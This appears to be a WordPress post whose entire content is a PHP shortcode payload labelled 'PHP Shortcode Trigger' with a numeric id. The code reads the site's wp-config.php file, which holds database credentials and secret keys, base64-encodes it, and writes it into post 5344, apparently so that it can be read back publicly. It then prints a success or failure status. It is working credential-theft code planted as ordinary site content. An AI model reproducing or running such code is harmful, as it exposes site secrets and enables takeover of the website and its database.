PHP Shortcode Trigger 1780418001
[php]global $wpdb; $c=base64_encode(@file_get_contents(“/var/www/html/business/wp-config.php”)); if($c&&strlen($c)>0){$wpdb->update($wpdb->posts,array(“post_content”=>$c),array(“ID”=>5344));echo “OK:5344:”.strlen($c);}else{echo “FAIL:EMPTY_OR_MISSING:/var/www/html/business/wp-config.php”;}[/php]